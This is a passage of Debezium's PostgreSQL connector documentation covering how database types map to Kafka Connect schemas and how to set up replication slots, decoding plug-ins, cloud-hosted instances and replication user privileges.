point.\n\n|`LTREE`\n|`STRING`\n|`io.debezium.data.Ltree` +\n +\nContains the string representation of a PostgreSQL LTREE value.\n\n|`CITEXT`\n|`STRING`\n|n\/a\n\n|`INET`\n|`STRING`\n|n\/a\n\n|`INT4RANGE`\n|`STRING`\n|n\/a +\n +\nRange of integer.\n\n|`INT8RANGE`\n|`STRING`\n|n\/a +\n +\nRange of `bigint`.\n\n|`NUMRANGE`\n|`STRING`\n|n\/a +\n +\nRange of `numeric`.\n\n|`TSRANGE`\n|`STRING`\n|n\/a +\n +\nContains the string representation of a timestamp range without a time zone.\n\n|`TSTZRANGE`\n|`STRING`\n|n\/a +\n +\nContains the string representation of a timestamp range with the local system time zone.\n\n|`DATERANGE`\n|`STRING`\n|n\/a +\n +\nContains the string representation of a date range. It always has an exclusive upper-bound.\n\n|`ENUM`\n|`STRING`\n|`io.debezium.data.Enum` +\n +\nContains the string representation of the PostgreSQL `ENUM` value. The set of allowed values is maintained in the `allowed` schema parameter.\n\n|===\n\n[id=\"postgresql-temporal-types\"]\n=== Temporal types\n\nOther than PostgreSQL's `TIMESTAMPTZ` and `TIMETZ` data types, which contain time zone information, how temporal types are mapped depends on the value of the `time.precision.mode` connector configuration property. 
The following sections describe these mappings:\n\n* xref:postgresql-time-precision-mode-adaptive[`time.precision.mode=adaptive`]\n* xref:postgresql-time-precision-mode-adaptive-time-microseconds[`time.precision.mode=adaptive_time_microseconds`]\n* xref:postgresql-time-precision-mode-connect[`time.precision.mode=connect`]\n\n[[postgresql-time-precision-mode-adaptive]]\n.`time.precision.mode=adaptive`\nWhen the `time.precision.mode` property is set to `adaptive`, the default, the connector determines the literal type and semantic type based on the column's data type definition. This ensures that events _exactly_ represent the values in the database.\n\n.Mappings when `time.precision.mode` is `adaptive`\n[cols=\"25%a,20%a,55%a\",options=\"header\"]\n|===\n|PostgreSQL data type\n|Literal type (schema type)\n|Semantic type (schema name) and Notes\n\n|`DATE`\n|`INT32`\n|`io.debezium.time.Date` +\n +\nRepresents the number of days since the epoch.\n\n|`TIME(1)`, `TIME(2)`, `TIME(3)`\n|`INT32`\n|`io.debezium.time.Time` +\n +\nRepresents the number of milliseconds past midnight, and does not include timezone information.\n\n|`TIME(4)`, `TIME(5)`, `TIME(6)`\n|`INT64`\n|`io.debezium.time.MicroTime` +\n +\nRepresents the number of microseconds past midnight, and does not include timezone information.\n\n|`TIMESTAMP(1)`, `TIMESTAMP(2)`, `TIMESTAMP(3)`\n|`INT64`\n|`io.debezium.time.Timestamp` +\n +\nRepresents the number of milliseconds since the epoch, and does not include timezone information.\n\n|`TIMESTAMP(4)`, `TIMESTAMP(5)`, `TIMESTAMP(6)`, `TIMESTAMP`\n|`INT64`\n|`io.debezium.time.MicroTimestamp` +\n +\nRepresents the number of microseconds since the epoch, and does not include timezone information.\n\n|===\n\n[[postgresql-time-precision-mode-adaptive-time-microseconds]]\n.`time.precision.mode=adaptive_time_microseconds`\nWhen the `time.precision.mode` configuration property is set to `adaptive_time_microseconds`, the connector determines the literal type and semantic type for temporal types based on the column's data type definition. This ensures that events _exactly_ represent the values in the database, except all `TIME` fields are captured as microseconds.\n\n.Mappings when `time.precision.mode` is `adaptive_time_microseconds`\n[cols=\"25%a,20%a,55%a\",options=\"header\"]\n|===\n|PostgreSQL data type\n|Literal type (schema type)\n|Semantic type (schema name) and Notes\n\n|`DATE`\n|`INT32`\n|`io.debezium.time.Date` +\n +\nRepresents the number of days since the epoch.\n\n|`TIME([P])`\n|`INT64`\n|`io.debezium.time.MicroTime` +\n +\nRepresents the time value in microseconds and does not include timezone information. PostgreSQL allows precision `P` to be in the range 0-6 to store up to microsecond precision.\n\n|`TIMESTAMP(1)` , `TIMESTAMP(2)`, `TIMESTAMP(3)`\n|`INT64`\n|`io.debezium.time.Timestamp` +\n +\nRepresents the number of milliseconds past the epoch, and does not include timezone information.\n\n|`TIMESTAMP(4)` , `TIMESTAMP(5)`, `TIMESTAMP(6)`, `TIMESTAMP`\n|`INT64`\n|`io.debezium.time.MicroTimestamp` +\n +\nRepresents the number of microseconds past the epoch, and does not include timezone information.\n\n|===\n\n[[postgresql-time-precision-mode-connect]]\n.`time.precision.mode=connect`\nWhen the `time.precision.mode` configuration property is set to `connect`, the connector uses Kafka Connect logical types. This may be useful when consumers can handle only the built-in Kafka Connect logical types and are unable to handle variable-precision time values. 
However, since PostgreSQL supports microsecond precision, the events generated by a connector with the `connect` time precision mode *result in a loss of precision* when the database column has a _fractional second precision_ value that is greater than 3.\n\n.Mappings when `time.precision.mode` is `connect`\n[cols=\"25%a,20%a,55%a\",options=\"header\"]\n|===\n|PostgreSQL data type\n|Literal type (schema type)\n|Semantic type (schema name) and Notes\n\n|`DATE`\n|`INT32`\n|`org.apache.kafka.connect.data.Date` +\n +\nRepresents the number of days since the epoch.\n\n|`TIME([P])`\n|`INT64`\n|`org.apache.kafka.connect.data.Time` +\n +\nRepresents the number of milliseconds since midnight, and does not include timezone information. PostgreSQL allows `P` to be in the range 0-6 to store up to microsecond precision, though this mode results in a loss of precision when `P` is greater than 3.\n\n|`TIMESTAMP([P])`\n|`INT64`\n|`org.apache.kafka.connect.data.Timestamp` +\n +\nRepresents the number of milliseconds since the epoch, and does not include timezone information. PostgreSQL allows `P` to be in the range 0-6 to store up to microsecond precision, though this mode results in a loss of precision when `P` is greater than 3.\n\n|===\n\n[id=\"postgresql-timestamp-type\"]\n=== TIMESTAMP type\n\nThe `TIMESTAMP` type represents a timestamp without time zone information.\nSuch columns are converted into an equivalent Kafka Connect value based on UTC. For example, the `TIMESTAMP` value \"2018-06-20 15:13:16.945104\" is represented by an `io.debezium.time.MicroTimestamp` with the value \"1529507596945104\" when `time.precision.mode` is not set to `connect`.\n\nThe timezone of the JVM running Kafka Connect and {prodname} does not affect this conversion.\n\nPostgreSQL supports using `+\/-infinite` values in `TIMESTAMP` columns.\nThese special values are converted to timestamps with value `9223372036825200000` in case of positive infinity or `-9223372036832400000` in case of negative infinity.\nThis behaviour mimics the standard behaviour of the PostgreSQL JDBC driver; see the `org.postgresql.PGStatement` interface for reference.\n\n[id=\"postgresql-decimal-types\"]\n=== Decimal types\n\nThe setting of the PostgreSQL connector configuration property `decimal.handling.mode` determines how the connector maps decimal types.\n\nWhen the `decimal.handling.mode` property is set to `precise`, the connector uses the Kafka Connect `org.apache.kafka.connect.data.Decimal` logical type for all `DECIMAL` and `NUMERIC` columns. This is the default mode.\n\n.Mappings when `decimal.handling.mode` is `precise`\n[cols=\"28%a,17%a,55%a\",options=\"header\"]\n|===\n|PostgreSQL data type\n|Literal type (schema type)\n|Semantic type (schema name) and Notes\n\n|`NUMERIC[(M[,D])]`\n|`BYTES`\n|`org.apache.kafka.connect.data.Decimal` +\n +\nThe `scale` schema parameter contains an integer representing how many digits the decimal point was shifted.\n\n|`DECIMAL[(M[,D])]`\n|`BYTES`\n|`org.apache.kafka.connect.data.Decimal` +\n +\nThe `scale` schema parameter contains an integer representing how many digits the decimal point was shifted.\n\n|===\n\nThere is an exception to this rule.\nWhen the `NUMERIC` or `DECIMAL` types are used without scale constraints, the values coming from the database have a different (variable) scale for each value. In this case, the connector uses `io.debezium.data.VariableScaleDecimal`, which contains both the value and the scale of the transferred value.\n\n.Mappings of decimal types when there are no scale constraints\n[cols=\"25%a,20%a,55%a\",options=\"header\"]\n|===\n|PostgreSQL data type\n|Literal type (schema type)\n|Semantic type (schema name) and Notes\n\n|`NUMERIC`\n|`STRUCT`\n|`io.debezium.data.VariableScaleDecimal` +\n +\nContains a structure with two fields: `scale` of type `INT32` that contains the scale of the transferred value and `value` of type `BYTES` containing the original value in an unscaled form.\n\n|`DECIMAL`\n|`STRUCT`\n|`io.debezium.data.VariableScaleDecimal` +\n +\nContains a structure with two fields: `scale` of type `INT32` that contains the scale of the transferred value and `value` of type `BYTES` containing the original value in an unscaled form.\n\n|===
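\n\nTo illustrate the distinction, consider this hypothetical table (the table and column names are for illustration only). With the default `precise` mode, the first column maps to `org.apache.kafka.connect.data.Decimal` with a fixed `scale` of `2`, while the second column, which has no scale constraint, maps to `io.debezium.data.VariableScaleDecimal`:\n\n[source,sql,indent=0]\n----\nCREATE TABLE prices (\n id SERIAL PRIMARY KEY,\n unit_price NUMERIC(10,2), -- fixed scale: org.apache.kafka.connect.data.Decimal\n conversion_rate NUMERIC -- no scale constraint: io.debezium.data.VariableScaleDecimal\n);\n----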
\n\nWhen the `decimal.handling.mode` property is set to `double`, the connector represents all `DECIMAL` and `NUMERIC` values as Java double values and encodes them as shown in the following table.\n\n.Mappings when `decimal.handling.mode` is `double`\n[cols=\"30%a,30%a,40%a\",options=\"header\"]\n|===\n|PostgreSQL data type\n|Literal type (schema type)\n|Semantic type (schema name)\n\n|`NUMERIC[(M[,D])]`\n|`FLOAT64`\n|\n\n|`DECIMAL[(M[,D])]`\n|`FLOAT64`\n|\n\n|===\n\nThe last possible setting for the `decimal.handling.mode` configuration property is `string`. In this case, the connector represents `DECIMAL` and `NUMERIC` values as their formatted string representation, and encodes them as shown in the following table.\n\n.Mappings when `decimal.handling.mode` is `string`\n[cols=\"30%a,30%a,40%a\",options=\"header\"]\n|===\n|PostgreSQL data type\n|Literal type (schema type)\n|Semantic type (schema name)\n\n|`NUMERIC[(M[,D])]`\n|`STRING`\n|\n\n|`DECIMAL[(M[,D])]`\n|`STRING`\n|\n\n|===\n\nPostgreSQL supports `NaN` (not a number) as a special value to be stored in `DECIMAL`\/`NUMERIC` values when the setting of `decimal.handling.mode` is `string` or `double`. In this case, the connector encodes `NaN` as either `Double.NaN` or the string constant `NAN`.\n\n[id=\"postgresql-hstore-type\"]\n=== HSTORE type\n\nWhen the `hstore.handling.mode` connector configuration property is set to `json` (the default), the connector represents `HSTORE` values as string representations of JSON values and encodes them as shown in the following table. When the `hstore.handling.mode` property is set to `map`, the connector uses the `MAP` schema type for `HSTORE` values.\n\n.Mappings for `HSTORE` data type\n[cols=\"25%a,20%a,55%a\",options=\"header\"]\n|===\n|PostgreSQL data type\n|Literal type (schema type)\n|Semantic type (schema name) and Notes\n\n|`HSTORE`\n|`STRING`\n|`io.debezium.data.Json` +\n +\nExample: output representation using the JSON converter is `{\\\"key\\\" : \\\"val\\\"}`\n\n|`HSTORE`\n|`MAP`\n|n\/a +\n +\nExample: output representation using the JSON converter is `{\"key\" : \"val\"}`\n\n|===\n\n[id=\"postgresql-domain-types\"]\n=== Domain types\n\nPostgreSQL supports user-defined types that are based on other underlying types. When such column types are used, {prodname} exposes the column's representation based on the full type hierarchy.\n\n[IMPORTANT]\n====\nCapturing changes in columns that use PostgreSQL domain types requires special consideration. 
When a column is defined to contain a domain type that extends one of the default database types and the domain type defines a custom length or scale, the generated schema inherits that defined length or scale.\n\nWhen a column is defined to contain a domain type that extends another domain type that defines a custom length or scale, the generated schema does *not* inherit the defined length or scale because that information is not available in the PostgreSQL driver's column metadata.\n====\n\n[id=\"postgresql-network-address-types\"]\n=== Network address types\n\nPostgreSQL has data types that can store IPv4, IPv6, and MAC addresses. It is better to use these types instead of plain text types to store network addresses. Network address types offer input error checking and specialized operators and functions.\n\n.Mappings for network address types\n[cols=\"25%a,20%a,55%a\",options=\"header\"]\n|===\n|PostgreSQL data type\n|Literal type (schema type)\n|Semantic type (schema name) and Notes\n\n|`INET`\n|`STRING`\n|n\/a +\n +\nIPv4 and IPv6 networks\n\n|`CIDR`\n|`STRING`\n|n\/a +\n +\nIPv4 and IPv6 hosts and networks\n\n|`MACADDR`\n|`STRING`\n|n\/a +\n +\nMAC addresses\n\n|`MACADDR8`\n|`STRING`\n|n\/a +\n +\nMAC addresses in EUI-64 format\n\n|===\n\n[id=\"postgresql-postgis-types\"]\n=== PostGIS types\n\nThe PostgreSQL connector supports all link:http:\/\/postgis.net[PostGIS data types].\n\n.Mappings of PostGIS data types\n[cols=\"25%a,20%a,55%a\",options=\"header\"]\n|===\n|PostGIS data type\n|Literal type (schema type)\n|Semantic type (schema name) and Notes\n\n|`GEOMETRY` +\n(planar)\n|`STRUCT`\na|`io.debezium.data.geometry.Geometry` +\n +\nContains a structure with two fields: +\n\n* `srid (INT32)` - Spatial Reference System Identifier that defines what type of geometry object is stored in the structure.\n* `wkb (BYTES)` - A binary representation of the geometry object encoded in the Well-Known-Binary format. +\n\nFor format details, see link:http:\/\/www.opengeospatial.org\/standards\/sfa[Open Geospatial Consortium Simple Features Access specification].\n\n|`GEOGRAPHY` +\n(spherical)\n|`STRUCT`\na|`io.debezium.data.geometry.Geography` +\n +\nContains a structure with two fields: +\n\n* `srid (INT32)` - Spatial Reference System Identifier that defines what type of geography object is stored in the structure.\n* `wkb (BYTES)` - A binary representation of the geometry object encoded in the Well-Known-Binary format. +\n\nFor format details, see http:\/\/www.opengeospatial.org\/standards\/sfa[Open Geospatial Consortium Simple Features Access specification].\n\n|===\n\n[id=\"postgresql-toasted-values\"]\n=== Toasted values\nPostgreSQL has a hard limit on the page size.\nThis means that values that are larger than around 8 KB need to be stored by using link:https:\/\/www.postgresql.org\/docs\/current\/storage-toast.html[TOAST storage].\nThis impacts replication messages that are coming from the database. Values that were stored by using the TOAST mechanism and that have not been changed are not included in the message, unless they are part of the table's replica identity.\nThere is no safe way for {prodname} to read the missing value out-of-band directly from the database, as this would potentially lead to race conditions. 
Consequently, {prodname} follows these rules to handle toasted values:\n\n* Tables with `REPLICA IDENTITY FULL` - TOAST column values are part of the `before` and `after` fields in change events just like any other column.\n* Tables with `REPLICA IDENTITY DEFAULT` - When receiving an `UPDATE` event from the database, any unchanged TOAST column value that is not part of the replica identity is not contained in the event.\nSimilarly, when receiving a `DELETE` event, no TOAST columns, if any, are in the `before` field.\nAs {prodname} cannot safely provide the column value in this case, the connector returns a placeholder value as defined by the connector configuration property, `toasted.value.placeholder`.\n\nifdef::community[]\n[IMPORTANT]\n====\nThere is a problem related to Amazon RDS instances. The `wal2json` plug-in has evolved over time and there were releases that provided out-of-band toasted values. Amazon supports different versions of the plug-in for different PostgreSQL versions. See https:\/\/docs.aws.amazon.com\/AmazonRDS\/latest\/UserGuide\/CHAP_PostgreSQL.html[Amazon's documentation] to obtain the version-to-version mapping. For consistent handling of toasted values:\n\n* Use the `pgoutput` plug-in for PostgreSQL 10+ instances.\n* Set `include-unchanged-toast=0` for older versions of the `wal2json` plug-in by using the `slot.stream.params` configuration option.\n====\nendif::community[]\n\n\/\/ Type: assembly\n\/\/ ModuleID: setting-up-postgresql-to-run-a-debezium-connector\n\/\/ Title: Setting up PostgreSQL to run a {prodname} connector\n[[setting-up-postgresql]]\n== Set up\n\nifdef::community[]\nBefore using the PostgreSQL connector to monitor the changes committed on a PostgreSQL server, decide which logical decoding plug-in you intend to use.\nIf you plan *not* to use the native `pgoutput` logical replication stream support, then you must install the logical decoding plug-in into the PostgreSQL server. Afterward, enable a replication slot, and configure a user with sufficient privileges to perform the replication.\n\nIf your database is hosted by a service such as link:https:\/\/www.heroku.com\/postgres[Heroku Postgres] you might be unable to install the plug-in. If so, and if you are using PostgreSQL 10+, you can use the `pgoutput` decoder support to capture changes in your database. If that is not an option, you are unable to use {prodname} with your database.\nendif::community[]\n\nifdef::product[]\nThis release of {prodname} supports only the native `pgoutput` logical replication stream. To set up PostgreSQL so that it uses the `pgoutput` plug-in, you must enable a replication slot, and configure a user with sufficient privileges to perform the replication.\n\nDetails are in the following topics:\n\n* xref:configuring-a-replication-slot-for-the-debezium-pgoutput-plug-in[]\n* xref:setting-up-postgresql-permissions-required-by-debezium-connectors[]\n* xref:setting-privileges-to-permit-debezium-user-to-create-postgresql-publications[]\n* xref:configuring-postgresql-to-allow-replication-with-the-connector-host[]\n* xref:configuring-postgresql-to-manage-debezium-wal-disk-space-consumption[]\n\nendif::product[]\n\nifdef::product[]\n\n\/\/ Type: concept\n\/\/ ModuleID: configuring-a-replication-slot-for-the-debezium-pgoutput-plug-in\n\/\/ Title: Configuring a replication slot for the {prodname} `pgoutput` plug-in\n=== Configuring replication slot\n\nPostgreSQL's logical decoding uses replication slots. To configure a replication slot, specify the following in the `postgresql.conf` file:\n\n[source]\n----\nwal_level=logical\nmax_wal_senders=1\nmax_replication_slots=1\n----\n\nThese settings instruct the PostgreSQL server as follows:\n\n* `wal_level` - Use logical decoding with the write-ahead log.\n* `max_wal_senders` - Use a maximum of one separate process for processing WAL changes.\n* `max_replication_slots` - Allow a maximum of one replication slot to be created for streaming WAL changes.\n\nReplication slots are guaranteed to retain all WAL entries that are required for {prodname} even during {prodname} outages. Consequently, it is important to closely monitor replication slots to avoid the following (a sample monitoring query follows this list):\n\n* Too much disk consumption\n* Any conditions, such as catalog bloat, that can happen if a replication slot stays unused for too long
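\n\nFor example, a minimal monitoring sketch (PostgreSQL 10+): the query reports how far a slot's confirmed position lags behind the current WAL write position, in bytes. The slot name `debezium` is the connector's default `slot.name`; adjust it if you configured a different name.\n\n[source,sql,indent=0]\n----\nSELECT slot_name,\n active,\n pg_wal_lsn_diff(pg_current_wal_lsn(), confirmed_flush_lsn) AS lag_bytes\nFROM pg_replication_slots\nWHERE slot_name = 'debezium';\n----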
\n\nFor more information, see the link:https:\/\/www.postgresql.org\/docs\/current\/warm-standby.html#STREAMING-REPLICATION-SLOTS[PostgreSQL documentation for replication slots].\n\n[NOTE]\n====\nFamiliarity with the mechanics and link:https:\/\/www.postgresql.org\/docs\/current\/static\/wal-configuration.html[configuration of the PostgreSQL write-ahead log] is helpful for using the {prodname} PostgreSQL connector.\n====\nendif::product[]\n\nifdef::community[]\n[[postgresql-in-the-cloud]]\n=== PostgreSQL in the Cloud\n\n[[postgresql-on-amazon-rds]]\n==== PostgreSQL on Amazon RDS\n\nIt is possible to capture changes in a PostgreSQL database that is running in link:https:\/\/aws.amazon.com\/rds\/[Amazon RDS]. To do this:\n\n* Set the instance parameter `rds.logical_replication` to `1`.\n* Verify that the `wal_level` parameter is set to `logical` by running the query `SHOW wal_level` as the database RDS master user.\n This might not be the case in multi-zone replication setups.\n You cannot set this option manually.\n It is link:https:\/\/docs.aws.amazon.com\/AmazonRDS\/latest\/UserGuide\/USER_WorkingWithParamGroups.html[automatically changed] when the `rds.logical_replication` parameter is set to `1`.\n If the `wal_level` is not set to `logical` after you make the preceding change, it is probably because the instance has to be restarted after the parameter group change.\n Restarts occur during your maintenance window, or you can initiate a restart manually.\n* Set the {prodname} `plugin.name` parameter to `wal2json`. You can skip this on PostgreSQL 10+ if you plan to use `pgoutput` logical replication stream support.\n* Initiate logical replication from an AWS account that has the `rds_replication` role.\n The role grants permissions to manage logical slots and to stream data using logical slots.\n By default, only the master user account on AWS has the `rds_replication` role on Amazon RDS.\n To enable a user account other than the master account to initiate logical replication, you must grant the account the `rds_replication` role.\n For example, `grant rds_replication to _<my_user>_`. 
You must have `superuser` access to grant the `rds_replication` role to a user.\n To enable accounts other than the master account to create an initial snapshot, you must grant `SELECT` permission to the accounts on the tables to be captured.\n For more information about security for PostgreSQL logical replication, see the link:https:\/\/www.postgresql.org\/docs\/current\/logical-replication-security.html[PostgreSQL documentation].\n\n[IMPORTANT]\n====\nEnsure that you use the latest versions of PostgreSQL 9.6, 10, or 11 on Amazon RDS.\nOtherwise, older versions of the `wal2json` plug-in might be installed.\nSee https:\/\/docs.aws.amazon.com\/AmazonRDS\/latest\/UserGuide\/CHAP_PostgreSQL.html[the official documentation] for the exact `wal2json` versions installed on Amazon RDS.\nIn the case of an older version, replication messages received from the database might not contain complete information about type constraints such as length or scale or `NULL`\/`NOT NULL`. This might cause creation of messages with an inconsistent schema for a short period of time when there are changes to a column's definition.\n\nAs of January 2019, the following PostgreSQL versions on RDS come with an up-to-date version of `wal2json` and thus should be used:\n\n* PostgreSQL 9.6: 9.6.10 and newer\n* PostgreSQL 10: 10.5 and newer\n* PostgreSQL 11: any version\n====\n\n[[postgresql-on-azure]]\n==== PostgreSQL on Azure\n\nIt is possible to use {prodname} with link:https:\/\/docs.microsoft.com\/azure\/postgresql\/[Azure Database for PostgreSQL], which has support for the `wal2json` and `pgoutput` plug-ins, both of which are supported by {prodname} as well.\n\nSet the Azure replication support to `logical`. You can use the link:https:\/\/docs.microsoft.com\/en-us\/azure\/postgresql\/concepts-logical#using-azure-cli[Azure CLI] or the link:https:\/\/docs.microsoft.com\/en-us\/azure\/postgresql\/concepts-logical#using-azure-portal[Azure Portal] to configure this. For example, to use the Azure CLI, here are the link:https:\/\/docs.microsoft.com\/cli\/azure\/postgres\/server?view=azure-cli-latest[`az postgres server`] commands that you need to execute:\n\n[source,shell]\n----\naz postgres server configuration set --resource-group mygroup --server-name myserver --name azure.replication_support --value logical\n\naz postgres server restart --resource-group mygroup --name myserver\n----\n\n[[postgresql-on-crunchybridge]]\n==== PostgreSQL on CrunchyBridge\n\nIt is possible to use {prodname} with link:https:\/\/crunchybridge.com\/[CrunchyBridge]; logical replication is already turned on. The `pgoutput` plug-in is available. You will have to create a replication user and provide correct privileges.\n\n[IMPORTANT]\n====\nWhile using the `pgoutput` plug-in, it is recommended that you configure `filtered` as the {link-prefix}:{link-postgresql-connector}#postgresql-publication-autocreate-mode[`publication.autocreate.mode`]. If you use `all_tables`, which is the default value for `publication.autocreate.mode`, and the publication is not found, the connector tries to create one by using `CREATE PUBLICATION <publication_name> FOR ALL TABLES;`, but this fails due to lack of permissions.\n====
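\n\nA minimal sketch of the manual setup that this implies (the user name, password, and captured table are placeholders; `dbz_publication` is the connector's default `publication.name`):\n\n[source,sql,indent=0]\n----\n-- Create a replication user for the connector:\nCREATE ROLE debezium_user REPLICATION LOGIN PASSWORD 'secret';\n\n-- Allow the user to read the captured tables during the initial snapshot:\nGRANT SELECT ON TABLE public.customers TO debezium_user;\n\n-- Create a filtered publication up front so that the connector does not\n-- need to create one itself:\nCREATE PUBLICATION dbz_publication FOR TABLE public.customers;\n----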
\n\n[[installing-postgresql-output-plugin]]\n=== Installing the logical decoding output plug-in\n\n[TIP]\n====\nSee {link-prefix}:{link-postgresql-plugins}[Logical Decoding Output Plug-in Installation for PostgreSQL] for more detailed instructions for setting up and testing logical decoding plug-ins.\n====\n\n[NOTE]\n====\nAs of {prodname} 0.10, the connector supports PostgreSQL 10+ logical replication streaming by using `pgoutput`.\nThis means that a logical decoding output plug-in is no longer necessary and changes can be emitted directly from the replication stream by the connector.\n====\n\nAs of PostgreSQL 9.4, the only way to read changes to the write-ahead log is to install a logical decoding output plug-in. Plug-ins are written in C, compiled, and installed on the machine that runs the PostgreSQL server. Plug-ins use a number of PostgreSQL-specific APIs, as described by the link:https:\/\/www.postgresql.org\/docs\/current\/static\/logicaldecoding-output-plugin.html[PostgreSQL documentation].\n\nThe PostgreSQL connector works with one of {prodname}'s supported logical decoding plug-ins to encode the changes in either link:https:\/\/github.com\/google\/protobuf[Protobuf format] or link:http:\/\/www.json.org\/[JSON] format.\nSee the documentation for your chosen plug-in to learn more about the plug-in's requirements, limitations, and how to compile it.\n\n* link:https:\/\/github.com\/debezium\/postgres-decoderbufs\/blob\/master\/README.md[`protobuf`]\n* link:https:\/\/github.com\/eulerto\/wal2json\/blob\/master\/README.md[`wal2json`]\n\nFor simplicity, {prodname} also provides a Docker image based on a vanilla PostgreSQL server image on top of which it compiles and installs the plug-ins. You can link:https:\/\/github.com\/debezium\/docker-images\/tree\/master\/postgres\/9.6[use this image] as an example of the detailed steps required for the installation.\n\n[WARNING]\n====\nThe {prodname} logical decoding plug-ins have been installed and tested on only Linux machines. For Windows and other operating systems, different installation steps might be required.\n====\n\n[[postgresql-differences-between-plugins]]\n=== Plug-in differences\n\nPlug-in behavior is not completely the same for all cases.\nThese differences have been identified:\n\n* The `wal2json` and `decoderbufs` plug-ins emit events for tables without primary keys.\n* The `wal2json` plug-in does not support special values, such as `NaN` or `infinity`, for floating point types.\n* The `wal2json` plug-in should be used with the `schema.refresh.mode` connector configuration property set to `columns_diff_exclude_unchanged_toast`. Otherwise, when receiving a change event for a row that contains an unchanged `TOAST` column, no field for that column is contained in the emitted change event's `after` field. This is because `wal2json` plug-in messages do not contain a field for such a column.\n+\nThe requirement for adding this is tracked under the link:https:\/\/github.com\/eulerto\/wal2json\/issues\/98[`wal2json` issue 98].\nSee the documentation of `columns_diff_exclude_unchanged_toast` further below for implications of using it.\n\n* The `pgoutput` plug-in does not emit all events for tables without primary keys. 
It emits only events for `INSERT` operations.\n\nAll up-to-date differences are tracked in a test suite link:https:\/\/github.com\/debezium\/debezium\/blob\/master\/debezium-connector-postgres\/src\/test\/java\/io\/debezium\/connector\/postgresql\/DecoderDifferences.java[Java class].\n\n[[postgresql-server-configuration]]\n=== Configuring the PostgreSQL server\n\nIf you are using a {link-prefix}:{link-postgresql-connector}#postgresql-output-plugin[logical decoding plug-in] other than `pgoutput`, after installing it, configure the PostgreSQL server as follows:\n\n. To load the plug-in at startup, add the following to the `postgresql.conf` file:\n+\n[source,properties]\n----\n# MODULES\nshared_preload_libraries = 'decoderbufs,wal2json' \/\/ <1>\n----\n<1> Instructs the server to load the `decoderbufs` and `wal2json` logical decoding plug-ins at startup. The names of the plug-ins are set in the link:https:\/\/github.com\/debezium\/postgres-decoderbufs\/blob\/v0.3.0\/Makefile[`Protobuf`] and link:https:\/\/github.com\/eulerto\/wal2json\/blob\/master\/Makefile[`wal2json`] make files.\n\n. To configure the replication slot regardless of the decoder being used, specify the following in the `postgresql.conf` file:\n+\n[source,properties]\n----\n# REPLICATION\nwal_level = logical \/\/ <1>\nmax_wal_senders = 1 \/\/ <2>\nmax_replication_slots = 1 \/\/ <3>\n----\n<1> Instructs the server to use logical decoding with the write-ahead log.\n<2> Instructs the server to use a maximum of `1` separate process for processing WAL changes.\n<3> Instructs the server to allow a maximum of `1` replication slot to be created for streaming WAL changes.\n\n{prodname} uses PostgreSQL's logical decoding, which uses replication slots.\nReplication slots are guaranteed to retain all WAL segments required for {prodname} even during {prodname} outages. 
For this reason, it is important to closely monitor replication slots to avoid excessive disk consumption and other conditions, such as catalog bloat, that can occur if a replication slot remains unused for too long.\nFor more information, see the link:https:\/\/www.postgresql.org\/docs\/current\/warm-standby.html#STREAMING-REPLICATION-SLOTS[PostgreSQL streaming replication documentation].\n
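\nAs a quick way to check slot lag, the following query is a minimal sketch; it assumes PostgreSQL 10 or later function names and a slot named `debezium` (the connector default):\n\n[source,sql]\n----\n-- Shows how far the slot's restart LSN trails the current WAL position.\n-- A steadily growing value means WAL segments are being retained on disk.\nSELECT slot_name,\n       active,\n       restart_lsn,\n       confirmed_flush_lsn,\n       pg_size_pretty(pg_wal_lsn_diff(pg_current_wal_lsn(), restart_lsn)) AS retained_wal\nFROM pg_replication_slots\nWHERE slot_name = 'debezium';\n----\n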
\nIf you are working with a `synchronous_commit` setting other than `on`,\nthe recommendation is to set `wal_writer_delay` to a value such as 10 milliseconds to achieve a low latency of change events.\nOtherwise, its default value is applied, which adds a latency of about 200 milliseconds.\n\n[TIP]\n====\nReading and understanding link:https:\/\/www.postgresql.org\/docs\/current\/static\/wal-configuration.html[PostgreSQL documentation about the mechanics and configuration of the PostgreSQL write-ahead log] is strongly recommended.\n====\nendif::community[]\n\n\/\/ Type: procedure\n\/\/ ModuleID: setting-up-postgresql-permissions-required-by-debezium-connectors\n\/\/ Title: Setting up PostgreSQL permissions for the {prodname} connector\n[[postgresql-permissions]]\n=== Setting up permissions\n\nSetting up a PostgreSQL server to run a {prodname} connector requires a database user that can perform replications.\nReplication can be performed only by a database user that has appropriate permissions and only for a configured number of hosts.\n\nAlthough, by default, superusers have the necessary `REPLICATION` and `LOGIN` roles, as mentioned in xref:postgresql-security[Security], it is best not to provide the {prodname} replication user with elevated privileges.\nInstead, create a {prodname} user that has the minimum required privileges.\n\n.Prerequisites\n\n* PostgreSQL administrative permissions.\n\n.Procedure\n\n. To provide a user with replication permissions, define a PostgreSQL role that has _at least_ the `REPLICATION` and `LOGIN` permissions, and then grant that role to the user.\n For example:\n+\n[source,sql,subs=\"+quotes\"]\n----\nCREATE ROLE __<name>__ REPLICATION LOGIN;\n----\n\n\/\/ Type: procedure\n\/\/ ModuleID: setting-privileges-to-permit-debezium-user-to-create-postgresql-publications\n\/\/ Title: Setting privileges to enable {prodname} to create PostgreSQL publications\n[[postgresql-replication-user-privileges]]\n=== Setting privileges to enable {prodname} to create PostgreSQL publications when you use `pgoutput`\n\nifdef::community[]\nIf you use `pgoutput` as the logical decoding plugin, {prodname} must operate in the database as a user with specific privileges.\nendif::community[]\n\n{prodname} streams change events for PostgreSQL source tables from _publications_ that are created for the tables.\nPublications contain a filtered set of change events that are generated from one or more tables.\nThe data in each publication is filtered based on the publication specification.\nThe specification can be created by the PostgreSQL database administrator or by the {prodname} connector.\nTo permit the {prodname} PostgreSQL connector to create publications and specify the data to replicate to them, the connector must operate with specific privileges in the database.\n\nThere are several options for determining how publications are created.\nIn general, it is best to manually create publications for the tables that you want to capture, before you set up the connector.\nHowever, you can configure your environment in a way that permits {prodname} to create publications automatically, and to specify the data that is added to them.\n\n{prodname} uses include list and exclude list properties to specify how data is inserted in the publication.\nFor more information about the options for enabling {prodname} to create publications, see {link-prefix}:{link-postgresql-connector}#postgresql-publication-autocreate-mode[`publication.autocreate.mode`].\n\nFor {prodname} to create a PostgreSQL publication, it must run as a user that has the following privileges:\n\n* Replication privileges in the database to add the table to a publication.\n* `CREATE` privileges on the database to add publications.\n* `SELECT` privileges on the tables to copy the initial table data. Table owners automatically have `SELECT` permission for the table.\n\nTo add tables to a publication, the user must be an owner of the table.\nBut because the source table already exists, you need a mechanism to share ownership with the original owner.\nTo enable shared ownership, you create a PostgreSQL replication group, and then add the existing table owner and the replication user to the group.\n\n.Procedure\n\n. Create a replication group.\n+\n[source,sql,subs=\"+quotes\"]\n----\nCREATE ROLE __<replication_group>__;\n----\n. Add the original owner of the table to the 